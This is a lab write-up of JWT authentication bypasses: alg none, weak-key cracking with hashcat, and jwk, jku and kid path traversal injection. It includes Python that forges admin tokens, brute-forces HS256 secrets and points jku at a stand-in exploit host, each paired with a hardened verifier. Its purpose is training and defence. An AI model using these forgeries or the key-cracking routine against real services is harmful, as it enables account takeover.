JWT Attacks
Lab: JWT authentication bypass via unverified signature
Decoding the token, we can see that the payload portion contains the username claim.

So we just need to change it to administrator, re-encode the payload, and replace the cookie value in the browser to see the admin page. Because this server never verifies the signature, the original signature can stay in place.


Lab: JWT authentication bypass via flawed signature verification
First, we will get the JWT after logging in to the user account.

After that, we will change the alg value in the header to none, change the username in the payload, and re-encode both parts back to Base64url.


Then, we will remove the signature portion at the end, keeping the trailing dot so the token still has three parts. It should look like this
Finally, change the value in the cookie and refresh the web page to get access to the administrator web page.
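The two bypasses above come down to the same thing: the server acts on the payload without a signature it actually checked. The following is an added example (not the lab's code or the author's) that forges both kinds of token with only the standard library and runs them against a model of each flawed server and against a hardened verifier. The secret, the usernames and the verifier functions are constructed stand-ins for the lab's server.

```python
import base64
import hashlib
import hmac
import json

# Constructed stand-in for the server's HS256 secret (assumption, not a lab value).
SERVER_SECRET = b"server-side-secret-for-demo"


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def encode_part(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def hs256(signing_input: str, key: bytes) -> bytes:
    return hmac.new(key, signing_input.encode(), hashlib.sha256).digest()


def issue_token(username: str, key: bytes = SERVER_SECRET) -> str:
    """What the server hands out after login: a properly signed HS256 token."""
    signing_input = encode_part({"alg": "HS256", "typ": "JWT"}) + "." + encode_part({"sub": username})
    return signing_input + "." + b64url_encode(hs256(signing_input, key))


def split_token(token: str):
    header_b64, payload_b64, sig_b64 = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64)), sig_b64


def forge_unverified_signature(token: str, username: str) -> str:
    """Lab 1: edit the sub claim and leave the original (now mismatching) signature in place."""
    header, payload, sig_b64 = split_token(token)
    payload["sub"] = username
    return encode_part(header) + "." + encode_part(payload) + "." + sig_b64


def forge_alg_none(token: str, username: str) -> str:
    """Lab 2: set alg to none, edit sub, drop the signature but keep the trailing dot."""
    header, payload, _ = split_token(token)
    header["alg"] = "none"
    payload["sub"] = username
    return encode_part(header) + "." + encode_part(payload) + "."


def verify_never_checks(token: str, key: bytes) -> dict:
    """Model of the lab 1 server: decodes the payload and never looks at the signature."""
    return split_token(token)[1]


def verify_trusts_alg(token: str, key: bytes) -> dict:
    """Model of the lab 2 server: lets the token's own alg field decide whether to verify."""
    header, payload, sig_b64 = split_token(token)
    if header.get("alg") == "none":
        return payload
    signing_input = token.rsplit(".", 1)[0]
    if not hmac.compare_digest(hs256(signing_input, key), b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return payload


def verify_hardened(token: str, key: bytes) -> dict:
    """Pin the algorithm server-side and always check the MAC in constant time."""
    header, payload, sig_b64 = split_token(token)
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    signing_input = token.rsplit(".", 1)[0]
    if not hmac.compare_digest(hs256(signing_input, key), b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return payload


def accepted(verifier, token: str, key: bytes = SERVER_SECRET):
    """The sub the verifier would act on, or None if it rejected the token."""
    try:
        return verifier(token, key)["sub"]
    except ValueError:
        return None


if __name__ == "__main__":
    wiener = issue_token("wiener")
    print(accepted(verify_never_checks, forge_unverified_signature(wiener, "administrator")))  # administrator
    print(accepted(verify_trusts_alg, forge_alg_none(wiener, "administrator")))                 # administrator
    print(accepted(verify_hardened, forge_alg_none(wiener, "administrator")))                   # None
```

The hardened verifier pins alg to what the server expects rather than reading it from the token, which is the one-line fix for both labs; a real deployment would also check exp and the intended audience.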

Lab: JWT authentication bypass via weak signing key
First, we will log in to get the JWT token.
We will then use hashcat (mode 16500 is the JWT mode) with a wordlist of common secrets to recover the signing key.
After running, we are able to get the secret key that was used.
We will put it in a file to be used to recalculate the signature so that the forged token is valid.

Next, we will intercept the request to /my-account and modify the JWT token as shown below.

After sending the request, we can see this.

However, if we try to enter the admin page, it will say we have no administrator rights. This is because the browser still holds the original cookie; the modified token was only sent in the intercepted request. So we need to find the JWT token that we modified just now and replace the cookie value in the browser to access the admin panel.
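What hashcat does in this lab is an offline dictionary attack: it recomputes the HMAC over the token's own header.payload with each candidate secret until one reproduces the signature, so no requests ever reach the server. The following added example (not the lab's code or the author's) does the same in plain Python against a constructed token and a tiny stand-in wordlist, then re-signs the token with the recovered secret and checks it the way the server would. The weak secret and the wordlist are assumptions for the demo.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def encode_part(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    signing_input = encode_part(header) + "." + encode_part(payload)
    mac = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(mac)


def crack_hs256_secret(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline guess: recompute the MAC over the token's header.payload with each candidate.
    hashcat does the same far faster: hashcat -a 0 -m 16500 token.txt jwt.secrets.list"""
    signing_input, _, sig_b64 = token.rpartition(".")
    target = b64url_decode(sig_b64)
    for candidate in wordlist:
        mac = hmac.new(candidate.encode(), signing_input.encode(), hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return candidate
    return None


def resign_as(token: str, secret: str, username: str) -> str:
    """Edit the sub claim in the captured token and re-sign it with the recovered secret."""
    header_b64, payload_b64, _ = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    payload["sub"] = username
    return sign_hs256(header, payload, secret.encode())


def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """The server-side check the forged token has to pass; returns the payload or None."""
    signing_input, _, sig_b64 = token.rpartition(".")
    mac = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(mac, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(signing_input.split(".")[1]))


# Constructed demo data: a weak secret a server might use, and a tiny stand-in for a
# secrets wordlist such as jwt.secrets.list (assumptions, not lab values).
WEAK_SECRET = b"secret1"
DEMO_WORDLIST = ["password", "secret", "changeme", "jwt_secret", "secret1", "admin123"]


def captured_token() -> str:
    """The token we would capture after logging in as the low-privilege user."""
    return sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "wiener"}, WEAK_SECRET)


if __name__ == "__main__":
    tok = captured_token()
    secret = crack_hs256_secret(tok, DEMO_WORDLIST)
    print("recovered secret:", secret)                                       # secret1
    forged = resign_as(tok, secret, "administrator")
    print("server accepts forged token:", verify_hs256(forged, WEAK_SECRET))  # {'sub': 'administrator'}
```

Because the whole attack runs offline, the only defence is a secret that is not guessable: a random key of at least 256 bits (the HS256 key size), not a word from any list.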

Lab: JWT authentication bypass via jwk header injection
First, generate a new RSA key.

Send a request with a JWT token to the Repeater.
After which, we will modify the payload as shown below.

Then we will click on Attack and Embedded JWK. This signs the token with the new RSA key and places its public half in the jwk header, which the vulnerable server then uses to verify the signature.

After which, it will generate the JWT token as shown below.

Lastly, we just need to change the cookie value in the browser to get into the admin panel.

Lab: JWT authentication bypass via jku header injection
We will use the JWK that we have created from the previous lab.
First, we will click on Copy Public Key as JWK.

Next, we will paste it into the body of the response on the exploit server, wrapped as a JWK Set (a keys array), and modify it to what is shown below.

Next, we will send a request with a JWT token to the Repeater and modify the token as shown below. Make sure that the kid matches the one uploaded to the exploit server, and that jku points at the exploit server URL.

After which, we will sign the token with the RSA key and send the request; we should be able to see the admin panel.

Finally, we will change the cookie on browser to access the admin panel

Lab: JWT authentication bypass via kid header path traversal
First, we will need to generate a symmetric key using JWT Editor. Its k value should be a Base64-encoded null byte (AA==), which matches the empty contents of /dev/null that the server will end up reading.

After generating, we will set the kid in the modified JWT token to a path traversal sequence pointing at /dev/null, together with whatever other changes we want to put into the token.

We will then sign the token using the symmetric key that we generated and send the request. We should be able to see the admin panel.

Finally, we can change the cookie value in the browser to access it.
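The jwk, jku and kid labs are one bug in three forms: the server lets a field in the token decide which key verifies the token. The following is an added example (not the lab's code, the author's, or JWT Editor's) that models such a server's key lookup with all three flaws, runs each attack against it, and shows a hardened lookup that rejects all three. It uses HMAC "oct" keys instead of the RSA keys the labs use, because the standard library has no RSA; the principle (attacker-supplied key material) is identical. The key directory, the trusted jku URL, the exploit-server URL and the in-memory stand-in for HTTP fetching are assumptions, and the /dev/null traversal assumes a POSIX host.

```python
import base64
import hashlib
import hmac
import json
import os
import tempfile
from typing import Callable, Optional


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def encode_part(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    signing_input = encode_part(header) + "." + encode_part(payload)
    return signing_input + "." + b64url_encode(hmac.new(key, signing_input.encode(), hashlib.sha256).digest())


# --- Constructed server state (assumptions, not lab values) ---
KEY_DIR = tempfile.mkdtemp(prefix="jwt-keys-")   # one key file per kid, as the kid lab's server does
SERVER_KEY = os.urandom(32)
with open(os.path.join(KEY_DIR, "key1"), "wb") as f:
    f.write(SERVER_KEY)
TRUSTED_JKU = "https://jwt-server.example/.well-known/jwks.json"   # hypothetical allowlisted URL
HOSTED_JWKS = {TRUSTED_JKU: {"keys": [{"kty": "oct", "kid": "key1", "k": b64url_encode(SERVER_KEY)}]}}


def fetch_jwks(url: str) -> dict:
    """Stand-in for the server's HTTP fetch of a JWK Set (url -> document; no network here)."""
    return HOSTED_JWKS[url]


def resolve_key_vulnerable(header: dict) -> bytes:
    """Every branch hands the attacker control of the verification key."""
    if "jwk" in header:                      # jwk injection: trust the key embedded in the token
        return b64url_decode(header["jwk"]["k"])
    if "jku" in header:                      # jku injection: fetch a key set from any URL in the token
        for jwk in fetch_jwks(header["jku"])["keys"]:
            if jwk["kid"] == header.get("kid"):
                return b64url_decode(jwk["k"])
    # kid traversal: kid is joined onto the key directory without sanitising ".."
    with open(os.path.join(KEY_DIR, header.get("kid", "key1")), "rb") as fh:
        return fh.read()


def resolve_key_hardened(header: dict) -> bytes:
    """Header fields are lookups into server-side state, never sources of key material."""
    if "jwk" in header:
        raise ValueError("embedded jwk not accepted")
    if header.get("jku", TRUSTED_JKU) != TRUSTED_JKU:
        raise ValueError("jku not on allowlist")
    for jwk in fetch_jwks(TRUSTED_JKU)["keys"]:
        if jwk["kid"] == header.get("kid", "key1"):   # exact match on a known kid; no filesystem paths
            return b64url_decode(jwk["k"])
    raise ValueError("unknown kid")


def verify(token: str, resolver: Callable[[dict], bytes]) -> Optional[dict]:
    """HS256 check using whichever key the resolver returns; payload on success, None otherwise."""
    signing_input, _, sig_b64 = token.rpartition(".")
    header = json.loads(b64url_decode(signing_input.split(".")[0]))
    if header.get("alg") != "HS256":
        return None
    try:
        key = resolver(header)
    except (ValueError, OSError):
        return None
    mac = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(mac, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(signing_input.split(".")[1]))


ADMIN = {"sub": "administrator"}


def attack_jwk() -> str:
    """jwk header injection: sign with our own key and ship it inside the header."""
    k = os.urandom(32)
    return sign_hs256({"alg": "HS256", "jwk": {"kty": "oct", "kid": "evil", "k": b64url_encode(k)}}, ADMIN, k)


def attack_jku() -> str:
    """jku header injection: host our own key set and point jku at it; kid must match the hosted kid."""
    k = os.urandom(32)
    HOSTED_JWKS["https://exploit.example/jwks.json"] = {"keys": [{"kty": "oct", "kid": "evil", "k": b64url_encode(k)}]}
    return sign_hs256({"alg": "HS256", "kid": "evil", "jku": "https://exploit.example/jwks.json"}, ADMIN, k)


def attack_kid_traversal() -> str:
    """kid path traversal: make the server read /dev/null as the key, then sign with the empty key."""
    return sign_hs256({"alg": "HS256", "kid": "../../../../../../../dev/null"}, ADMIN, b"")


def null_key_equivalent(msg: bytes = b"x") -> bool:
    """HMAC zero-pads keys shorter than the block size, so an empty key and a single null byte
    (JWT Editor's k="AA==") give the same MAC. That is why the lab's key works against /dev/null."""
    return hmac.new(b"", msg, hashlib.sha256).digest() == hmac.new(b"\x00", msg, hashlib.sha256).digest()
```

Two points worth noting from the hardened resolver: jku is compared for exact equality with a fixed URL (prefix or hostname checks are routinely bypassed with open redirects or look-alike paths), and kid is only ever used as a dictionary key against keys the server already holds, so a traversal string simply fails to match.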
